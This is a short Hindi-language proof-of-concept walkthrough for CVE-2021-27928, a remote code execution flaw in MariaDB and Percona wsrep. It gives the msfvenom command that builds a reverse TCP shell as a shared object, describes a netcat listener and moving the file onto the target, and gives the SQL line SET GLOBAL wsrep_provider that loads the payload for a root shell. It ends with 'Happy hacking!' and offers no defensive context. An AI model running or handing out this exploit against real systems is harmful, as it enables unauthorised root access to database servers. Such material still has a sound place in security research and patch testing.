
CVE-2021-27928-POC
मारियाDB 10.2 (10.2.37 से पहले), 10.3 (10.3.28 से पहले), 10.4 (10.4.18 से पहले), और 10.5 (10.5.9 से पहले); पेरकोना सर्वर (2021-03-03 तक); और MySQL के लिए wsrep पैच (2021-03-03 तक) में एक दूरस्थ कोड निष्पादन समस्या पाई गई। एक अविश्वसनीय खोज पथ eval इंजेक्शन की ओर ले जाता है, जिसमें डेटाबेस SUPER उपयोगकर्ता wsrep_provider और wsrep_notify_cmd को संशोधित करने के बाद OS कमांड निष्पादित कर सकता है। नोट: यह ओरेकल उत्पाद को प्रभावित नहीं करता है।
चलिए Msfvenom के साथ अपना पेलोड बनाते हैं। अपने पेलोड के लिए हम /linux/x64/shell_reverse_tcp का उपयोग करेंगे, जिसमें LHOST के लिए हमारा IP और LPORT के लिए PORT नंबर होगा। हम -f के साथ फ़ाइल प्रकार भी निर्दिष्ट करेंगे, जो हमारे मामले में elf-so है। और हम आउटपुट फ़ाइल को -o विकल्प के साथ CVE-2021.27928.so के रूप में सहेजेंगे।
msfvenom -p linux/x64/shell_reverse_tcp LHOST= LPORT= -f elf-so -o CVE-2021-27928.so

हमारा पेलोड तैयार है! चलिए अपने निर्दिष्ट पोर्ट पर एक netcat लिसनर सेट करते हैं।
चलिए अपनी फ़ाइल को लक्ष्य मशीन पर ले जाते हैं। इसके लिए हम कोई भी तरीका इस्तेमाल कर सकते हैं। मैं python http server का उपयोग करूंगा।

चलिए फ़ाइल को /tmp निर्देशिका में सहेजते हैं

अब हमें डेटाबेस में लॉग इन करना होगा और wsrep_provider को हमारे अपलोड किए गए पेलोड पर सेट करना होगा।
SET GLOBAL wsrep_provider="/tmp/CVE-2021-27928.so";

अब हमारे लिसनर की जाँच करने का समय है। यदि हम सफल रहे तो हमें मशीन पर रूट शेल प्राप्त हो जाना चाहिए!

हैप्पी हैकिंग!